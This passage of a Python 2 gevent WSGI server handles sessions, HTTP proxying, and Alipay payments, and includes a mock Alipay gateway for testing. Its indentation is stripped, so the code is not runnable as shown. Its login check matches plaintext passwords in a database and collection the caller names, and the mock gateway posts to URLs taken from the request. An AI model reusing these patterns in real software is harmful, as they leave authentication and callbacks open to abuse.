if gConfig['authorize_platform']['session']['session_check_ip'].lower() == 'true':
l = gSessionStore.get_list_by_username(username)
for i in l:
if i.has_key('ip') and i['ip'] != environ['REMOTE_ADDR']:
ret = False
break
return ret, ip
def get_websocket(environ):
ret = None
if environ.has_key("wsgi.websocket") and environ['wsgi.websocket']:
ret = environ['wsgi.websocket']
return ret
def ws_send(channel=None, string=''):
global gWebSocketsMap
for k in gWebSocketsMap.keys():
ws = None
if channel:
if '|' + channel in k:
ws = gWebSocketsMap[k]
else:
ws = gWebSocketsMap[k]
if ws and not ws.closed:
try:
ws.send(string)
except geventwebsocket.WebSocketError, e:
print('ws_send exception:%s' % str(e))
elif ws and ws.closed:
del gWebSocketsMap[k]
def ws_session_query():
ret = json.dumps(db_util.remove_mongo_id(gSessionStore.list()), ensure_ascii=True, indent=4)
return ret
def ws_recv(environ):
ret = None
ws = get_websocket(environ)
if ws and not ws.closed:
msg = None
try:
msg = ws.receive()
except geventwebsocket.WebSocketError, e:
print('ws_recv exception:%s' % str(e))
if msg:
try:
ret = json.loads(msg)
except:
ret = msg
return ret
def application_combiz_platform(environ, start_response):
global STATICRESOURCE_DIR
global gConfig, gRequest, gSessionStore
def proxy(environ):
connection_timeout, network_timeout = 5.0, 10.0
proxy_type = ''
if '/proxy_platform' in path_info:
proxy_type = 'proxy_platform'
if '/proxy_file' in path_info:
proxy_type = 'proxy_file'
if '/proxy_pay' in path_info:
proxy_type = 'proxy_pay'
try:
connection_timeout = float(gConfig['combiz_platform'][proxy_type]['www_connection_timeout'])
except:
pass
try:
network_timeout = float(gConfig['combiz_platform'][proxy_type]['www_network_timeout'])
except:
pass
return handle_http_proxy(environ, proxy_type, gConfig['combiz_platform'][proxy_type]['protocol'], gConfig['combiz_platform'][proxy_type]['host'], gConfig['combiz_platform'][proxy_type]['port'], '', connection_timeout, network_timeout)
headers = {}
headerslist = []
cookie_header = None
body = ''
statuscode = '200 OK'
if not ip_check(environ, start_response):
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'your_ip_access_deny'}, ensure_ascii=True, indent=4)
start_response(statuscode, headerslist)
return [body]
path_info = environ['PATH_INFO']
statuscode = '200 OK'
if path_info[-1:] == '/':
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
elif check_is_static(path_info):
statuscode, headers, body = handle_static(environ, path_info)
elif len(path_info)>7 and path_info[:7] == '/proxy_':
statuscode, headers, body = proxy(environ)
else:
statuscode, headers, body = handle_combiz_platform(environ)
headers = CORS_header(headers)
for k in headers:
headerslist.append((k, headers[k]))
#print(headerslist)
start_response(statuscode, headerslist)
return [body]
def application_authorize_platform(environ, start_response):
global STATICRESOURCE_DIR
global gConfig, gRequest, gSessionStore
headers = {}
headerslist = []
cookie_header = None
body = ''
statuscode = '200 OK'
if not ip_check(environ, start_response):
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'your_ip_access_deny'}, ensure_ascii=True, indent=4)
start_response(statuscode, headerslist)
return [body]
path_info = environ['PATH_INFO']
if gSessionStore is None:
gSessionStore = MongodbSessionStore(host=gConfig['authorize_platform']['mongodb']['host'],
port=int(gConfig['authorize_platform']['mongodb']['port']),
replicaset=gConfig['authorize_platform']['mongodb']['replicaset'],
db = gConfig['authorize_platform']['mongodb']['database'],
collection = gConfig['authorize_platform']['mongodb']['collection_session'],
)
is_expire = False
statuscode = '200 OK'
if path_info[-1:] == '/':
#path_info += gConfig['web']['indexpage']
#statuscode, headers, body = handle_static(environ, path_info)
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
elif check_is_static(path_info):
statuscode, headers, body = handle_static(environ, path_info)
else:
with session_manager(environ):
sess, cookie_header, is_expire = check_session(environ, gRequest, gSessionStore)
if is_expire:
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
statuscode = '200 OK'
body = json.dumps({'result':u'session_expired'}, ensure_ascii=True, indent=4)
if sess:
if not sess.has_key('ip'):
sess['ip'] = environ['REMOTE_ADDR']
gSessionStore.save_if_modified(sess)
else:
statuscode, headers, body = handle_authorize_platform(environ, sess)
headers = CORS_header(headers)
if cookie_header:
headerslist.append(cookie_header)
for k in headers:
headerslist.append((k, headers[k]))
#print(headerslist)
start_response(statuscode, headerslist)
return [body]
def application_chat_platform(environ, start_response):
global STATICRESOURCE_DIR
global gConfig, gRequest, gSessionStore
headers = {}
headerslist = []
cookie_header = None
body = ''
statuscode = '200 OK'
if not ip_check(environ, start_response):
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'your_ip_access_deny'}, ensure_ascii=True, indent=4)
start_response(statuscode, headerslist)
return [body]
path_info = environ['PATH_INFO']
#if gSessionStore is None:
#gSessionStore = MongodbSessionStore(host=gConfig['chat_platform']['mongodb']['host'],
#port=int(gConfig['chat_platform']['mongodb']['port']),
#replicaset=gConfig['chat_platform']['mongodb']['replicaset'],
#db = gConfig['chat_platform']['mongodb']['database'],
#collection = gConfig['chat_platform']['mongodb']['collection_session'],
#)
#is_expire = False
statuscode = '200 OK'
if path_info[-1:] == '/':
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
elif check_is_static(path_info):
statuscode, headers, body = handle_static(environ, path_info)
else:
#with session_manager(environ):
#sess, cookie_header, is_expire = check_session(environ, gRequest, gSessionStore)
#if is_expire:
#headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
#statuscode = '200 OK'
#body = json.dumps({'result':u'session_expired'}, ensure_ascii=True, indent=4)
#if sess:
#if not sess.has_key('ip'):
#sess['ip'] = environ['REMOTE_ADDR']
#gSessionStore.save_if_modified(sess)
#else:
statuscode, headers, body = handle_chat_platform(environ, None)
headers = CORS_header(headers)
if cookie_header:
headerslist.append(cookie_header)
for k in headers:
headerslist.append((k, headers[k]))
#print(headerslist)
start_response(statuscode, headerslist)
return [body]
def sign_and_send(thirdpay, method, href, data, need_sign=True):
ret = None
if thirdpay == 'alipay':
ret = sign_and_send_alipay(method, href, data, need_sign)
return ret
def sign_and_send_alipay(method, href, data, need_sign=True):
global gConfig
qs = build_query_string(data)
if need_sign:
signed = get_sign_alipay(qs)
qs += '&sign=%s' % signed
qs += '&sign_type=%s' % gConfig['pay_platform']['alipay']['sign_type']
text = qs
text = enc_by_code(gConfig['pay_platform']['alipay']['input_charset'], text)
connection_timeout, network_timeout = float(gConfig['pay_platform']['alipay']['connection_timeout']), float(gConfig['pay_platform']['alipay']['network_timeout'])
client = HTTPClient.from_url(href, concurrency=1, connection_timeout=connection_timeout, network_timeout=network_timeout, )
g = None
if method == 'get':
if not href[-1:] == '?':
href += '?'
href += urllib.quote(text)
g = gevent.spawn(client.get, href)
if method == 'post':
postdata = urllib.quote(text)
headers = {}
headers['Content-Type'] = 'application/x-www-form-urlencoded; text/html; charset=%s' % str(gConfig['pay_platform']['alipay']['input_charset'])
g = gevent.spawn(client.post, href, body=postdata, headers=headers)
return g
def fake_gateway_alipay_return(querydict):
global gConfig
sign_data = {}
if querydict['service'] == 'refund_fastpay_by_platform_pwd':
sign_data['is_success'] = 'T'
#sign_data['refund_result'] = 'TRADE_PENDING'
elif querydict['service'] == 'create_direct_pay_by_user':
if querydict.has_key('out_trade_no'):
sign_data['is_success'] = 'T'
sign_data['notify_id'] = str(ObjectId())
sign_data['notify_time'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
sign_data['notify_type'] = 'trade_status_sync'
sign_data['out_trade_no'] = querydict['out_trade_no']
sign_data['partner'] = gConfig['fake_gateway_alipay']['alipay']['partner_id']
if querydict.has_key('seller_email'):
sign_data['seller_email'] = querydict['seller_email']
if querydict.has_key('subject'):
sign_data['subject'] = querydict['subject']
if querydict.has_key('buyer_email'):
sign_data['buyer_email'] = querydict['buyer_email']
if querydict.has_key('total_fee'):
sign_data['total_fee'] = querydict['total_fee']
#sign_data['trade_no'] = ''
sign_data['trade_status'] = 'TRADE_PENDING'
href = str(gConfig['pay_platform']['alipay']['return_url'])
if querydict.has_key('return_url'):
href = querydict['return_url']
sign_and_send_alipay('get', href, sign_data)
else:
print('fake_gateway_alipay_return out_trade_no required')
def fake_gateway_alipay_notify(querydict):
global gConfig
def get_pay_log_rec_by_trade_no(trade_no):
ret = None
db_util.mongo_init_client('pay_platform')
client = db_util.gClientMongo['pay_platform']
db = client['pay']
if 'pay_log' in db.collection_names(False):
collection = db['pay_log']
ret = collection.find_one({"trade_no":trade_no})
return ret
data = {}
if querydict['service'] == 'refund_fastpay_by_platform_pwd':
data['notify_time'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
data['notify_type'] = 'batch_refund_notify'
data['notify_id'] = str(ObjectId())
data['batch_no'] = querydict['batch_no']
data['success_num'] = '1'
detail_data = querydict['detail_data']
arr = detail_data.split('^')
trade_no = arr[0]
refund_fee = float(arr[1])
result_details = '%s^%s^%s' % (arr[0], arr[1], 'SUCCESS')
data['result_details'] = result_details
href = str(gConfig['pay_platform']['alipay']['notify_url'])
sign_and_send_alipay('post', href, data)
rec = get_pay_log_rec_by_trade_no(trade_no)
if rec:
data = {}
data['notify_type'] = 'trade_status_sync'
data['out_trade_no'] = rec['out_trade_no']
data['refund_status'] = 'REFUND_SUCCESS'
if refund_fee < rec['total_fee']:
data['trade_status'] = 'TRADE_SUCCESS'
else:
data['trade_status'] = 'TRADE_CLOSED'
sign_and_send_alipay('post', href, data)
elif querydict['service'] == 'create_direct_pay_by_user':
if querydict.has_key('out_trade_no'):
data['out_trade_no'] = querydict['out_trade_no']
data['notify_id'] = str(ObjectId())
data['notify_time'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
data['notify_type'] = 'trade_status_sync'
data['partner'] = gConfig['fake_gateway_alipay']['alipay']['partner_id']
if querydict.has_key('buyer_email'):
data['buyer_email' ] = querydict['buyer_email']
if querydict.has_key('seller_email'):
data['seller_email'] = querydict['seller_email']
if querydict.has_key('subject'):
data['subject'] = querydict['subject']
if querydict.has_key('total_fee'):
data['total_fee'] = querydict['total_fee']
if querydict.has_key('paymethod') and querydict['paymethod'] == 'bankPay':
data['bank_seq_no'] = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
data['trade_no'] = datetime.datetime.now().strftime("%Y%m%d%H%M%S") + str(ObjectId())
data['trade_status'] = 'TRADE_SUCCESS'
href = str(gConfig['pay_platform']['alipay']['notify_url'])
sign_and_send_alipay('post', href, data)
else:
print('fake_gateway_alipay_notify out_trade_no required')
def fake_gateway_alipay_error_notify(querydict, error_code):
global gConfig
data = {}
if querydict['service'] == 'refund_fastpay_by_platform_pwd':
data['notify_time'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
data['notify_type'] = 'batch_refund_notify'
data['notify_id'] = str(ObjectId())
data['batch_no'] = querydict['batch_no']
data['success_num'] = '0'
detail_data = querydict['detail_data']
arr = detail_data.split('^')
result_details = '%s^%s^%s' % (arr[0], arr[1], error_code)
data['result_details'] = result_details
href = str(gConfig['pay_platform']['alipay']['notify_url'])
if querydict.has_key('notify_url'):
href = str(querydict['notify_url'])
sign_and_send_alipay('post', href, data)
elif querydict['service'] == 'create_direct_pay_by_user':
data['partner'] = gConfig['fake_gateway_alipay']['alipay']['partner_id']
if querydict.has_key('out_trade_no'):
data['out_trade_no'] = querydict['out_trade_no']
data['error_code'] = error_code
if querydict.has_key('buyer_email'):
data['buyer_email'] = querydict['buyer_email']
if querydict.has_key('seller_email'):
data['seller_email'] = querydict['seller_email']
href = str(gConfig['pay_platform']['alipay']['error_notify_url'])
sign_and_send_alipay('post', href, data, need_sign=False)
else:
print('fake_gateway_alipay_error_notify out_trade_no required')
def dec_by_code(code, string):
encode, decode, reader, writer = codecs.lookup(str(code))
text = string
text, length = decode(text, 'replace')
return text
def enc_by_code(code, string):
encode, decode, reader, writer = codecs.lookup(str(code))
text = string
text, length = encode(text, 'replace')
return text
def handle_fake_gateway_alipay(environ, error_code_pay=None, error_code_refund=None):
global ENCODING
global gConfig
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
d = {}
querydict = {}
querystring = ''
querystring1 = ''
if environ.has_key('QUERY_STRING'):
querystring = environ['QUERY_STRING']
querydict = urlparse.parse_qs(querystring)
for key in querydict.keys():
d[key] = querydict[key][0]
querydict = d
if not environ.has_key('QUERY_STRING') or len(environ['QUERY_STRING'])==0:
buf = environ['wsgi.input'].read()
querystring = urllib.unquote_plus(buf)
querystring = dec_by_code(gConfig['pay_platform']['alipay']['input_charset'], querystring)
querydict = urlparse.parse_qs(querystring)
d = {}
for key in querydict.keys():
d[key] = querydict[key][0]
querydict = d
try:
querystring1 = querystring[:querystring.index('&sign=')]
except:
pass
try:
querystring1 = querystring1[:querystring1.index('&sign_type=')]
except:
pass
signed1 = None
if querydict['service'] == 'create_direct_pay_by_user':
fake_gateway_alipay_return(querydict)
if querydict['service'] == 'refund_fastpay_by_platform_pwd':
headers['Content-Type'] = 'text/xml;charset=' + ENCODING
body = '<?xml version="1.0" encoding="UTF-8"?><IS_SUCCESS>T</IS_SUCCESS>'
gevent.sleep(float(gConfig['fake_gateway_alipay']['alipay']['process_second']))
#print(querydict)
if querydict.has_key('sign') and querydict.has_key('sign_type') and querydict.has_key('_input_charset'):
ok = check_sign_alipay(querydict['_input_charset'], querydict['sign'], querydict['sign_type'], querystring1)
if ok:
error_code = error_code_pay
if error_code is None:
error_code = error_code_refund
if error_code:
fake_gateway_alipay_error_notify(querydict, error_code)
else:
fake_gateway_alipay_notify(querydict)
else:
print('signature check error')
fake_gateway_alipay_error_notify(querydict, 'ILLEGAL_SIGN')
else:
print('need sign or sign_type or _input_charset')
return statuscode, headers, body
def application_fake_gateway_alipay(environ, start_response):
global STATICRESOURCE_DIR
global gConfig, gSecurityConfig
headers = {}
headerslist = []
body = ''
statuscode = '200 OK'
path_info = environ['PATH_INFO']
statuscode = '200 OK'
if path_info[-1:] == '/':
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
elif check_is_static(path_info):
statuscode, headers, body = handle_static(environ, path_info)
elif path_info == '/gateway.do':
error_code_pay = gConfig['fake_gateway_alipay']['alipay']['error_code_pay']
error_code_refund = gConfig['fake_gateway_alipay']['alipay']['error_code_refund']
if len(error_code_pay) == 0:
error_code_pay = None
if error_code_pay and not gSecurityConfig['alipay']['error_code'].has_key(error_code_pay):
error_code_pay = None
if len(error_code_refund) == 0:
error_code_refund = None
if error_code_refund and not gSecurityConfig['alipay']['error_code'].has_key(error_code_refund):
error_code_refund = None
statuscode, headers, body = handle_fake_gateway_alipay(environ, error_code_pay, error_code_refund)
headers = CORS_header(headers)
for k in headers:
headerslist.append((k, headers[k]))
start_response(statuscode, headerslist)
return [body]
def application_pay_platform(environ, start_response):
global STATICRESOURCE_DIR
global gConfig, gWebSocketsMap, gJoinableQueue
def check_is_static(aUrl):
ret = False
surl = dec(aUrl)
if surl[0:2] == '//':
surl = surl[2:]
if surl[0] == '/':
surl = surl[1:]
p = os.path.join(STATICRESOURCE_DIR , surl)
isBin = False
ext = os.path.splitext(p)[1]
if '.' in surl:
ext = surl[surl.rindex('.'):]
else:
ext = os.path.splitext(p)[1]
if len(ext)>0 and gConfig['mime_type'].has_key(ext):
ret = True
return ret
def handle_websocket(environ):
ws = get_websocket(environ)
app = gConfig['wsgi']['application']
interval = 1.0
try:
interval = float(gConfig[app]['websocket']['interval_poll'])
except:
interval = 1.0
while ws and not ws.closed:
obj = ws_recv(environ)
if obj and isinstance(obj, dict) and obj.has_key('op'):
if obj['op'] == 'queue_size':
qsize = 0
if gJoinableQueue:
qsize = gJoinableQueue.qsize()
ws.send(json.dumps({'queue_size':qsize}, ensure_ascii=True, indent=4))
else:
try:
ws.send('')
except:
for k in gWebSocketsMap.keys():
if gWebSocketsMap[k] is ws:
gWebSocketsMap[k].close()
del gWebSocketsMap[k]
break
gevent.sleep(interval)
if ws and ws.closed:
del ws
headers = {}
headerslist = []
body = ''
statuscode = '200 OK'
if not ip_check(environ, start_response):
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'your_ip_access_deny'}, ensure_ascii=True, indent=4)
start_response(statuscode, headerslist)
return [body]
path_info = environ['PATH_INFO']
headerslist = []
statuscode = '200 OK'
#print('path_info=%s' % path_info)
if path_info[-1:] == '/':
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
elif check_is_static(path_info):
statuscode, headers, body = handle_static(environ, path_info)
elif path_info == '/pay':
statuscode, headers, body = handle_pay(environ)
elif path_info == '/refund':
statuscode, headers, body = handle_refund(environ)
elif path_info == '/query':
statuscode, headers, body = handle_pay_getinfo(environ)
elif path_info == '/alipay_return_url':
headerslist.append(('Content-Type', 'text/plain;charset=' + ENCODING))
handle_alipay_return_url(environ)
elif path_info == '/alipay_notify_url':
headerslist.append(('Content-Type', 'text/plain;charset=' + ENCODING))
handle_alipay_notify_url(environ)
body = 'success'
elif path_info == '/alipay_error_notify_url':
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
handle_alipay_error_notify_url(environ)
headers = CORS_header(headers)
for k in headers:
headerslist.append((k, headers[k]))
#print(headerslist)
start_response(statuscode, headerslist)
if path_info == '/websocket':
handle_websocket(environ)
return [body]
def handle_http_proxy(environ, proxy_placeholder='proxy', real_protocol='http', real_host='localhost', real_port='80', token='', connection_timeout=5.0, network_timeout=10.0, request_headers={}):
global ENCODING, gHttpClient, gRequest, gProxyRequest
path_info = environ['PATH_INFO']
if environ.has_key('QUERY_STRING') and len(environ['QUERY_STRING'])>0:
path_info += '?' + environ['QUERY_STRING']
request = None
if gProxyRequest is None:
request = Request(environ)
else:
request = gProxyRequest
method = request.method.lower()
data = request.get_data()
headers = {}
for i in request.headers:
headers[i[0]] = enc(i[1])
for k in request_headers.keys():
headers[k] = request_headers[k]
headers['Host'] = real_host
#for k in headers.keys():
#print('%s=%s' % (k, headers[k]))
href = '%s://%s:%s%s' % (real_protocol, real_host, real_port, path_info.replace('/%s/' % proxy_placeholder, '/'))
if '?' in href:
href += '&'
else:
href += '?';
href += 'token=%s&random=%d' % ( token, random.randint(0,100000) )
print('proxy to %s' % href)
header = {'Content-Type': 'application/json;charset=' + ENCODING, 'Cache-Control': 'no-cache'}
ret = ''
url = URL(href)
if not gHttpClient.has_key('http_proxy'):
gHttpClient['http_proxy'] = HTTPClient(url.host, port=url.port, connection_timeout=connection_timeout, network_timeout=network_timeout, concurrency=200)
client = gHttpClient['http_proxy']
response = None
try:
if method == 'get':
response = client.get(url.request_uri, headers)
elif method == 'put':
response = client.put(url.request_uri, data, headers)
elif method == 'delete':
response = client.delete(url.request_uri, data, headers)
elif method == 'post':
response = client.post(url.request_uri, data, headers)
except Exception,e:
idx = 0
e1 = e
while (e1.errno == 10053 or e1.errno == 10054) and idx < 4:
idx += 1
print('encounter 10053 error, trying %d reconnecting...' % idx)
try:
if method == 'get':
response = client.get(url.request_uri, headers)
elif method == 'put':
response = client.put(url.request_uri, data, headers)
elif method == 'delete':
response = client.delete(url.request_uri, data, headers)
elif method == 'post':
response = client.post(url.request_uri, data, headers)
break
except Exception,e2:
e1 = e2
if idx >= 4:
raise e1
if response:
if hasattr(response, 'status_code'):
if response.status_code == 200 or response.status_code == 304:
ret = response.read()
# print(ret)
header = {}
for k in response._headers_index.keys():
if not k in ['transfer-encoding', ]:
v = response._headers_index[k]
if '-' in k:
k = '-'.join([i.capitalize() for i in k.split('-')])
else:
k = k.capitalize()
header[k] = v
else:
msg = 'handle_http_proxy response error:%d' % response.status_code
ret = json.dumps({'result':msg}, ensure_ascii=True, indent=4)
#raise Exception(msg)
else:
raise Exception('handle_http_proxy error: response has no status_code')
else:
raise Exception('handle_http_proxy error')
return '200 OK', header, ret
def application_webgis(environ, start_response):
global ENCODING
global gConfig, gRequest, gSessionStore, gWebSocketsMap
def handle_websocket(environ):
key = str(gevent.getcurrent().__hash__())
ws = get_websocket(environ)
if not gWebSocketsMap.has_key(key):
gWebSocketsMap[key] = ws
app = gConfig['wsgi']['application']
interval = 1.0
try:
interval = float(gConfig[app]['websocket']['interval_poll'])
except:
interval = 1.0
while ws and not ws.closed:
obj = ws_recv(environ)
if obj and isinstance(obj, dict) and obj.has_key('op'):
if obj['op'] == 'queue_size':
qsize = 0
if gJoinableQueue:
qsize = gJoinableQueue.qsize()
ws.send(json.dumps({'queue_size':qsize}, ensure_ascii=True, indent=4))
if obj['op'] == 'turn_on_sound':
ws.send('')
else:
try:
ws.send('')
except:
for k in gWebSocketsMap.keys():
if gWebSocketsMap[k] is ws:
gWebSocketsMap[k].close()
del gWebSocketsMap[k]
break
gevent.sleep(interval)
if ws and ws.closed:
del ws
return '200 OK', {}, ''
def proxy(environ, request_headers={}):
global gConfig
connection_timeout, network_timeout = 5.0, 10.0
try:
connection_timeout = float(gConfig['webgis']['anti_bird']['www_connection_timeout'])
except:
pass
try:
network_timeout = float(gConfig['webgis']['anti_bird']['www_network_timeout'])
except:
pass
token = md5.new('bird%s' % time.strftime('%Y%m%d')).hexdigest()
path_info = environ['PATH_INFO']
if '/hasBird' in path_info:
request_headers['Content-Type'] = 'application/json'
return handle_http_proxy(environ, 'proxy', 'http', gConfig['webgis']['anti_bird']['tcp_host'], gConfig['webgis']['anti_bird']['http_port'], token, connection_timeout, network_timeout, request_headers)
# def get_anti_bird_list_from_cache():
# ret = '{"result":"get_anti_bird_list_from_cache_error:cannot connect to db"}'
# arr = []
# if gConfig['webgis'].has_key('anti_bird') and gConfig['webgis']['anti_bird'].has_key('mongodb'):
# db_util.mongo_init_client('anti_bird')
# db = db_util.gClientMongo['anti_bird'][gConfig['webgis']['anti_bird']['mongodb']['database']]
# collection = db[gConfig['webgis']['anti_bird']['mongodb']['detector_collection']]
# arr = db_util.remove_mongo_id(list(collection.find({})))
# ret = json.dumps(arr, ensure_ascii=True, indent=4)
# return ret
#
# def get_latest_records_from_cache():
# ret = '{"result":"get_latest_records_from_cache_error:cannot connect to db"}'
# arr = []
# if gConfig['webgis'].has_key('anti_bird') and gConfig['webgis']['anti_bird'].has_key('mongodb'):
# db_util.mongo_init_client('anti_bird')
# db = db_util.gClientMongo['anti_bird'][gConfig['webgis']['anti_bird']['mongodb']['database']]
# collection = db[gConfig['webgis']['anti_bird']['mongodb']['detector_collection']]
# arr = db_util.remove_mongo_id(list(collection.find({})))
# ret = json.dumps(arr, ensure_ascii=True, indent=4)
# return ret
def set_cookie(key, value):
secure = False
if gConfig['listen_port']['enable_ssl'].lower() == 'true':
secure = True
max_age = 60
try:
session_age = int(gConfig['webgis']['session']['session_age'])
except:
pass
# cookie = ('Set-Cookie', dump_cookie(key, value, domain=str(gConfig['webgis']['session']['session_domain']), max_age=session_age, secure=secure))
cookie = ('Set-Cookie', dump_cookie(key, value, max_age=session_age, secure=secure))
return cookie
def get_cookie_data(request, key=None):
string = '{}'
if request:
string = request.cookies.get('session_data')
ret = None
if string and len(string)>0:
try:
ret = json.loads(string)
if key and ret.has_key(key):
ret = ret[key]
else:
ret = None
except:
pass
return ret
def set_cookie_data(request, data):
string = '{}'
ret = None
if request:
string = request.cookies.get('session_data')
if string and len(string)>0:
try:
obj = json.loads(string)
if isinstance(obj, dict) and isinstance(data, dict):
for key in data.keys():
obj[key] = data[key]
string = json.dumps(obj)
ret = set_cookie('session_data', string)
except:
pass
return ret
def session_handle(environ, request, session_store):
sid = get_cookie_data(request, 'session_id')
sess = None
cookie = None
is_expire = False
if sid is None or len(sid)==0:
request.session = session_store.new()
# session_store.save(request.session)
sess = request.session
cookie = set_cookie_data(None, {'session_id': request.session.sid})
is_expire = True
else:
request.session = session_store.get(sid)
if request.session:
o = {'session_id': request.session.sid}
for k in request.session.keys():
if not k in [u'password',]:
o[k] = request.session[k]
cookie = set_cookie_data(request, o)
session_store.save_if_modified(request.session)
else:
cookie = set_cookie('session_data', '{}')
is_expire = True
# if request.session.should_save:
# session_store.save(request.session)
sess = request.session
return sess, cookie, is_expire
def handle_login(environ):
ret = None
querydict, buf = get_querydict_by_GET_POST(environ)
if querydict.has_key('db') and querydict.has_key('collection') and querydict.has_key('username') and querydict.has_key('password'):
ret = db_util.mongo_find_one(querydict['db'],
querydict['collection'],
{'username':querydict['username'],
'password':querydict['password']})
return ret
def handle_state_examination(environ):
def get_collection(collection):
ret = None
db_util.mongo_init_client('webgis')
db = db_util.gClientMongo['webgis'][gConfig['webgis']['mongodb']['database']]
if not collection in db.collection_names(False):
ret = db.create_collection(collection)
else:
ret = db[collection]
return ret
def state_examination_save(querydict):
def modifier(adict = {}):
for k in adict.keys():
if not k in ['_id', 'check_year']:
adict[k] = adict[k].strip()
if k == 'line_name':
adict[k] = adict[k].replace('-', '')\
.replace('500kV', '').replace('220kV', '').replace('110kV', '').replace('35kV', '').replace('10kV', '')\
.replace(u'Ⅱ', 'II').replace(u'Ⅰ', 'I')
if adict[k][-1] == u'回':
adict[k] = adict[k].replace( u'回', u'回线')
if not adict[k][-1] == u'线':
adict[k] = adict[k] + u'线'
if k == 'line_state' or 'unit_' in k:
adict[k] = adict[k].replace(u'正常', 'I').replace(u'注意', 'II').replace(u'异常', 'III').replace(u'严重', 'IV')
return adict
ret = []
collection = get_collection('state_examination')
if isinstance(querydict, dict) and querydict.has_key('line_name') and querydict.has_key('check_year'):
querydict['line_name'] = querydict['line_name'].strip()
existone = collection.find_one({'line_name':querydict['line_name'].strip(), 'check_year':querydict['check_year']})
if existone:
querydict['_id'] = str(existone['_id'])
querydict = modifier(querydict)
_id = collection.save(db_util.add_mongo_id(querydict))
ret = collection.find_one({'_id':_id})
if ret:
ret = db_util.remove_mongo_id(ret)
if isinstance(querydict, list):
for i in querydict:
i = modifier(i)
existone = collection.find_one({'line_name':i['line_name'], 'check_year':i['check_year']})
if existone:
i['_id'] = str(existone['_id'])
collection.save(db_util.add_mongo_id(i))
return json.dumps(ret, ensure_ascii=True, indent=4)
def state_examination_query_line_names(querydict):
ret = []
collection = get_collection('state_examination')
pipeline = [
# {'$unwind':'$line_name'},
{"$group": {"_id": "$line_name", "count": {"$sum": 1}}},
]
ret = list(collection.aggregate(pipeline))
ret = map(lambda x:x['_id'], ret)
return json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
def state_examination_query(querydict):
ret = []
collection = get_collection('state_examination')
if isinstance(querydict, dict):
# print(querydict)
ret = list(collection.find(db_util.add_mongo_id(querydict)))
return json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
def state_examination_delete(querydict):
ret = []
collection = get_collection('state_examination')
if isinstance(querydict, dict):
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
existone = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if existone:
collection.remove({'_id':existone['_id']})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'record_not_exist' }, ensure_ascii=True, indent=4)
if isinstance(querydict['_id'], list):
ids = db_util.add_mongo_id(querydict['_id'])
cond = {'_id':{'$in':ids}}
collection.remove(cond)
ret = json.dumps(db_util.remove_mongo_id(querydict['_id']), ensure_ascii=True, indent=4)
return json.dumps(ret, ensure_ascii=True, indent=4)
statuscode, headers, body = '200 OK', {}, ''
urls = gUrlMap.bind_to_environ(environ)
querydict, buf = get_querydict_by_GET_POST(environ)
endpoint, args = urls.match()
if args.has_key('_id') and isinstance(querydict, dict):
querydict['_id'] = args['_id']
if endpoint == 'state_examination_save':
body = state_examination_save(querydict)
elif endpoint == 'state_examination_query':
body = state_examination_query(querydict)
elif endpoint == 'state_examination_delete':
body = state_examination_delete(querydict)
elif endpoint == 'state_examination_query_line_names':
body = state_examination_query_line_names(querydict)
return statuscode, headers, body
def handle_antibird(environ):
global gConfig, gUrlMap, ENCODING
def init_list(environ):
ret = []
s = '{"result":"unknown how to get anti bird list"}'
# if gConfig['webgis'].has_key('anti_bird') and gConfig['webgis']['anti_bird'].has_key('fetch_from_www') and gConfig['webgis']['anti_bird']['fetch_from_www'].lower() == 'true':
if True:
environ['PATH_INFO'] = '/proxy/api/detector'
environ['QUERY_STRING'] = ''
code, header, s = proxy(environ)
# if gConfig['webgis'].has_key('anti_bird') and gConfig['webgis']['anti_bird'].has_key('fetch_from_www') and gConfig['webgis']['anti_bird']['fetch_from_www'].lower() == 'false':
# if False:
# s = get_anti_bird_list_from_cache()
try:
if len(s)>0:
obj = json.loads(s)
if isinstance(obj, dict) :
if obj.has_key('result'):
print('antibird/init_list error:%s' % obj['result'])
else:
if obj.has_key('_id'):
if obj.has_key('imei'):
obj['label'] = obj['imei']
obj['value'] = obj['imei']
ret = [obj, ]
else:
print('antibird/init_list error: unknown error')
ret = []
elif isinstance(obj, list) :
for i in obj:
idx = obj.index(i)
if i.has_key('imei'):
i['label'] = i['imei']
i['value'] = i['imei']
obj[idx] = i
ret = obj
except Exception,e:
raise
return ret
def get_latest_records(environ, querydict):
ret = []
objstr = ''
if querydict.has_key('imei') and len(querydict['imei'])>0:
records_num = 1
if querydict.has_key('records_num') and len(querydict['records_num'])>0:
records_num = int(querydict['records_num'])
href = '/proxy/api/detector/%s/log/%d' % (querydict['imei'], records_num)
environ['PATH_INFO'] = href
environ['QUERY_STRING'] = ''
status, header, objstr = proxy(environ)
if len(objstr)>0:
try:
